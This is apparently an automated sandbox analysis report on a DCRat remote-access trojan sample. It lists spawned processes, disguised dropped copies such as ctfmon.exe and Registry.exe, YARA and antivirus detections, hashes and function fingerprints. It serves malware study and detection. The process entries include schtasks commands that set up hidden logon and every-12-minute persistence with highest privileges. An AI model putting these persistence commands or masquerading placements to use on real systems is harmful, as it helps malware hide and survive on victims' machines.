                Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:16
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:17
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                Imagebase:0xb40000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2085969443.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 79%, ReversingLabs
                Has exited:true

                General

                Target ID:18
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                Imagebase:0xf80000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.2132989514.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                General

                Target ID:19
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                Imagebase:0x130000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.2140699573.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                General

                Target ID:20
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\Public\AccountPictures\Registry.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\AccountPictures\Registry.exe
                Imagebase:0xab0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2148302161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2148302161.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                General

                Target ID:21
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\Public\AccountPictures\Registry.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\AccountPictures\Registry.exe
                Imagebase:0x5f0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2143381456.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                General

                Target ID:22
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\user\StartMenuExperienceHost.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\StartMenuExperienceHost.exe
                Imagebase:0x6a0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2153356357.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                General

                Target ID:23
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\user\StartMenuExperienceHost.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\StartMenuExperienceHost.exe
                Imagebase:0xa70000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2151848592.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                General

                Target ID:24
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                Imagebase:0xdb0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                General

                Target ID:25
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                Imagebase:0x730000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2152498750.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Disassembly

                Reset < >

                  Executed Functions

                  Function 00007FF848F034AC Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID: Z_H
                  • API String ID: 0-256909865
                  • Opcode ID: 7021c247c87dfe50f743bca6e1f50875c74c64a8a722466008ff166a4f6494c5
                  • Instruction ID: 2b482f1550394c6f070d5e4d079f8c0d03d6b3c97688a10c32a13b9c3bf7b670
                  • Opcode Fuzzy Hash: 7021c247c87dfe50f743bca6e1f50875c74c64a8a722466008ff166a4f6494c5
                  • Instruction Fuzzy Hash: 60F1B071D1DA4A8FEB45EB28C8587A9BFE1FF5A340F4400BAC009C72D2EB786545CB51
                  Function 00007FF848F09D61 Relevance: 1.2, Instructions: 1207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: feedb37ac3c02aa2b1a54b5370eefb08ef89bbc5d0940b7eb302aed2b71ed30d
                  • Instruction ID: 7cb6ff8f56dd571d7dee7942c8d9278362a9b155ab025471660c607804c5895a
                  • Opcode Fuzzy Hash: feedb37ac3c02aa2b1a54b5370eefb08ef89bbc5d0940b7eb302aed2b71ed30d
                  • Instruction Fuzzy Hash: 67928D3090D6898FDB46EB3488696A97FF0FF1A301F0545FBD449CB1A2EB38A985C751
                  Function 00007FF848F0AE60 Relevance: .5, Instructions: 539COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ba0730d07173a94fdbd7f2f2678ee0fecbacb24ab1c6865b3704c1e9a95c3df
                  • Instruction ID: b58602e7d31e5c699bb295b341635d7242d6658cb838ef27bbd5d3df37823ac5
                  • Opcode Fuzzy Hash: 7ba0730d07173a94fdbd7f2f2678ee0fecbacb24ab1c6865b3704c1e9a95c3df
                  • Instruction Fuzzy Hash: 8E02AB3490D68A8FEB95FB2888596FA7BF0FF5A341F0405BBD449C7192EB38A444CB54
                  Function 00007FF848F0AD25 Relevance: .4, Instructions: 386COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d95f1ee17d359904047b199bd8069ec81712dd271888e9da9d4c655de6edbda7
                  • Instruction ID: 2cbc7cce31f3575a5ace444c6ac76e6fdd634acb0ea31a10f7707a9fcbbbbcb5
                  • Opcode Fuzzy Hash: d95f1ee17d359904047b199bd8069ec81712dd271888e9da9d4c655de6edbda7
                  • Instruction Fuzzy Hash: 58D18C3090D69E8FEB99EF2488592FA7BA0FF55341F0405BBD809C71D2DB38A994C785
                  Function 00007FF848F0A87D Relevance: .4, Instructions: 375COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac51897cac7c14bf1f69a28fe11011ee63af59b8886447ecc204cd623916f413
                  • Instruction ID: 894d81e3b8acc50f0e9c8c5980711a400c07e0ef7c1df84ffb59ab8a9e5dca5d
                  • Opcode Fuzzy Hash: ac51897cac7c14bf1f69a28fe11011ee63af59b8886447ecc204cd623916f413
                  • Instruction Fuzzy Hash: 00C1CD3090D68A8FE746EB2888996FA7BF0FF5A341F0545BBD409C70D2EB38A584C715
                  Function 00007FF848F0C3BF Relevance: .4, Instructions: 401COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60d908f5974ddd7e59801e5938fe7eae094eca4997e3244c05b2a2afbed71a5c
                  • Instruction ID: 126aabb0369e4e3dc8986808b3114af57b12ccdca5919f49a7032cbec3b212a6
                  • Opcode Fuzzy Hash: 60d908f5974ddd7e59801e5938fe7eae094eca4997e3244c05b2a2afbed71a5c
                  • Instruction Fuzzy Hash: 4BD18F3494E78A8FEB56AB2488192FA3FB0FF16350F0505BBD848C70D2FB28A559C755
                  Function 00007FF848F02D53 Relevance: .4, Instructions: 386COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a6404acb97840e69e6c688401738e27453848c03daad84bccfca90ae11209c3
                  • Instruction ID: 07b28a53818993eb8d6b72a15b14ee2524a0af60422dc55c66a3c9b8c6e03759
                  • Opcode Fuzzy Hash: 9a6404acb97840e69e6c688401738e27453848c03daad84bccfca90ae11209c3
                  • Instruction Fuzzy Hash: 4DD19F30D0D68E8FEB52FBB888596B97BE0EF1A341F0445B6D409C71E2EB38A544C765
                  Function 00007FF848F0ACA5 Relevance: .4, Instructions: 361COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f1f6d1c34cc92e23f216e22a4cc327dd4a3a9a9ab7f66737afba93fe39a5710
                  • Instruction ID: 9e71ea6fef285acb359aa77d08a6dee7240c79a60720edf0dca3822d3d09265d
                  • Opcode Fuzzy Hash: 3f1f6d1c34cc92e23f216e22a4cc327dd4a3a9a9ab7f66737afba93fe39a5710
                  • Instruction Fuzzy Hash: 19D10630D1966ACFDBA8EB68C4546BDB7B1FF59341F1000B9D40EE3292CB396881CB55
                  Function 00007FF848F03138 Relevance: .3, Instructions: 324COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b317efab2036d4964cdc01cfb0f9861c8a68265f905d28742dce7e5a1001dfbc
                  • Instruction ID: fca3e2a8067d72c5aa9547080ac87aafb27978f42723a1f1b2deab3ea377efee
                  • Opcode Fuzzy Hash: b317efab2036d4964cdc01cfb0f9861c8a68265f905d28742dce7e5a1001dfbc
                  • Instruction Fuzzy Hash: CFB15A30D0D6498FEB55EB68C8586A9BBF0EF5A341F0441BAD409D71D2EB38A944CB25
                  Function 00007FF848F01C75 Relevance: .3, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0964de2388401cf63ac51a6db1a90acc7837a1f69d3cc8765d25e8321b413acc
                  • Instruction ID: 6e2ff3c43f32574e64fb24954cb029fecec1398190294a58f3da3f8f0c4e0cfa
                  • Opcode Fuzzy Hash: 0964de2388401cf63ac51a6db1a90acc7837a1f69d3cc8765d25e8321b413acc
                  • Instruction Fuzzy Hash: DB91E331A0DA8E8FDB59EF2888555BA7BE1FF96340F1041BED449C32C2EB34A845C745
                  Function 00007FF848F0ACAD Relevance: .3, Instructions: 284COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bce1b83f66b22066e45c8f74a44af44ad1504dc27ea405cbc673423f53459e27
                  • Instruction ID: 8b3191ea57b5ef2fb44d878241237d95289a0dbd8490ca2145eef06f2a49afd9
                  • Opcode Fuzzy Hash: bce1b83f66b22066e45c8f74a44af44ad1504dc27ea405cbc673423f53459e27
                  • Instruction Fuzzy Hash: 2691FE34D0D68A8FEB56EF2888582FA7FE0FF5A301F0445BAD409CB192EB38A554C754
                  Function 00007FF848F005F0 Relevance: .3, Instructions: 277COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 94bde5934a64c5416881cefe4a426375c6af97524adc87d4e7a3bdd0c57684bd
                  • Instruction ID: 4934711b1d5cb500458ffeded77913ce8c60862436ad7d0786edaece21cfbfc5
                  • Opcode Fuzzy Hash: 94bde5934a64c5416881cefe4a426375c6af97524adc87d4e7a3bdd0c57684bd
                  • Instruction Fuzzy Hash: A5819E30A1DA4E8FDB49EF2888555BA77E1FF99341F10457ED40AC32D2EB34A881C745
                  Function 00007FF848F01111 Relevance: .3, Instructions: 271COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19363512496a44328e2aa240351729444f0339b86fdc4a7a71706024d79ab2e1
                  • Instruction ID: 9792fff360a7457e435f2ba5b95e8931504c68bf42a0230cb7243a60766a834f
                  • Opcode Fuzzy Hash: 19363512496a44328e2aa240351729444f0339b86fdc4a7a71706024d79ab2e1
                  • Instruction Fuzzy Hash: 0791AE70D0DA4A8FEB59EF68C8596BA7BE0FF5A341F0404BAD409D71D2EB34A484C751
                  Function 00007FF848F02248 Relevance: .3, Instructions: 269COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6751fba056d35de343ceb4c841314f22c18b3b9c96ac9a2fd111386a96ce125
                  • Instruction ID: 0e6c40972f246664bd50e31d28ce3d1f95a96804cc8a9d0f98cf202cc3d3ee00
                  • Opcode Fuzzy Hash: e6751fba056d35de343ceb4c841314f22c18b3b9c96ac9a2fd111386a96ce125
                  • Instruction Fuzzy Hash: 84A19E30D0D65A8FEB69EB6488557B877A0FF46340F1041BAD44DD71C2EF786984CB68
                  Function 00007FF848F01738 Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60ef26250cbcfa9252a7a40b39e250fddde730e445adc78041c38dd13d9b42ec
                  • Instruction ID: 0f51ffb96b85c09f23da4442425e2f4932964165999a97efac4272fcf2316131
                  • Opcode Fuzzy Hash: 60ef26250cbcfa9252a7a40b39e250fddde730e445adc78041c38dd13d9b42ec
                  • Instruction Fuzzy Hash: 80719B31A0CA4A8FDB49EF1C88516A977E2FF9A744F14457AE44EC32C6DF34A842C785
                  Function 00007FF848F0AD5D Relevance: .2, Instructions: 247COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5bfd2036c0b0f75dfef4d1ad320cdca2b43a90ddf8e10cd107ccb3ac77a4669d
                  • Instruction ID: d2a88579ca9229cfe4c48da3d67da7ebae369d9c0c3535999fbf2d6870a92211
                  • Opcode Fuzzy Hash: 5bfd2036c0b0f75dfef4d1ad320cdca2b43a90ddf8e10cd107ccb3ac77a4669d
                  • Instruction Fuzzy Hash: F1815A3091D69E8FEB95FF2488592FA7BB0FF59341F0405BAE809C7192DB38A944CB45
                  Function 00007FF848F005D0 Relevance: .2, Instructions: 233COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 20f773504fc3f89b54649fdbfd5045ce8948cbc37935eaeaa26a2752a3e73580
                  • Instruction ID: 3a995ddb90de056cc26109281058e033b360583838eadffef9673ef35b9a3203
                  • Opcode Fuzzy Hash: 20f773504fc3f89b54649fdbfd5045ce8948cbc37935eaeaa26a2752a3e73580
                  • Instruction Fuzzy Hash: 5C61AE31A1DA4A8FDB49EF1888555BA77E2FF99344F10457EE44AC32C2EF34A842C785
                  Function 00007FF848F02AE0 Relevance: .2, Instructions: 222COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c559605216bf1cee71584ecb4002b2cc81950ba60fcc039dd57abf8d58844f20
                  • Instruction ID: 20ce8efac3e93541e73cf170a9b2880081c0d4236ca5e1420ea216bdbfa15b53
                  • Opcode Fuzzy Hash: c559605216bf1cee71584ecb4002b2cc81950ba60fcc039dd57abf8d58844f20
                  • Instruction Fuzzy Hash: 90719E3090DA4A8FEB95EB28C8586F97BE0FF19350F1404BAD409C71D6EF78A984C755
                  Function 00007FF848F0AD1D Relevance: .2, Instructions: 222COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7988e7074885900f37008aca5d3337f8c49f50860db4e6c9ead92b36285dd034
                  • Instruction ID: 6e071e7ab03d2dcaec9f7f1ebdba56390880cac94a472fee5c651be6007485d0
                  • Opcode Fuzzy Hash: 7988e7074885900f37008aca5d3337f8c49f50860db4e6c9ead92b36285dd034
                  • Instruction Fuzzy Hash: F071773090C69E8FEB99FF2488592BA7BB1FF59341F0005BAD809C7192DB39A944CB45
                  Function 00007FF848F02A80 Relevance: .2, Instructions: 205COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e524272fefbca2e63fdf437e3bf142e8fe3483ba5afba8802df8c236e2699e8
                  • Instruction ID: 63602344deb038ed959495f6def14b8788424b49c6861e8738684b8a15a11e0d
                  • Opcode Fuzzy Hash: 8e524272fefbca2e63fdf437e3bf142e8fe3483ba5afba8802df8c236e2699e8
                  • Instruction Fuzzy Hash: 3661D33180E68A9FE795BB3898552FA7FA0EF06364F0405BBD44CC60D3EF2869488759
                  Function 00007FF848F0AE68 Relevance: .2, Instructions: 196COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1480b38406281ecd50ba78c018dc7a1280b34279bb6a5d2a9413e1de2e651e5
                  • Instruction ID: d8bf8e2fab348b733604670c4df1428f719b1d742201ca08b40b730138324822
                  • Opcode Fuzzy Hash: f1480b38406281ecd50ba78c018dc7a1280b34279bb6a5d2a9413e1de2e651e5
                  • Instruction Fuzzy Hash: 50515B3090D68E8FDB95EB2888586EA7BB0FF56340F0505BBD818C7192EB38A544CB55
                  Function 00007FF848F0BC8A Relevance: .2, Instructions: 177COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44c98c6adafee230f08cef4a1833b40c8dc48f1caa0bd717289a53d68ff253bd
                  • Instruction ID: 15235415060268581e5d921edc88ab8e33e2806b74ed3a3555cab18cd8c2bb00
                  • Opcode Fuzzy Hash: 44c98c6adafee230f08cef4a1833b40c8dc48f1caa0bd717289a53d68ff253bd
                  • Instruction Fuzzy Hash: 5251883091D64E8FEB95EB28C4586E9BBF0FF1A340F0444BAD409E3191EB38A544CB55
                  Function 00007FF848F02EB9 Relevance: .2, Instructions: 175COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9522501d98ad8d136102fc7c7f6cae43e51c1fe3e3c8a0f617fac0fd41f4802e
                  • Instruction ID: 3eb2968240480e8d1e19775ac53cc9d9c2a95b963c2ad9cd82c64edd76f94a1e
                  • Opcode Fuzzy Hash: 9522501d98ad8d136102fc7c7f6cae43e51c1fe3e3c8a0f617fac0fd41f4802e
                  • Instruction Fuzzy Hash: 2851C330D4E28A8FE752ABB488182FA7BF0EF17345F0445BAD408D61D2FB78A548C765
                  Function 00007FF848F00500 Relevance: .2, Instructions: 170COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43537043d54d52b3c8354fac223026047e4541cab80ba614c8c0a613e209ecda
                  • Instruction ID: 9473f346e7d683f03e6d8e3053de18756dbe767c169dc7a6c6f2276116c7f290
                  • Opcode Fuzzy Hash: 43537043d54d52b3c8354fac223026047e4541cab80ba614c8c0a613e209ecda
                  • Instruction Fuzzy Hash: ED519E3090D68E8FEB56EB7488586B97BE0FF1A341F1544BBD809C70E2EB38A544C721
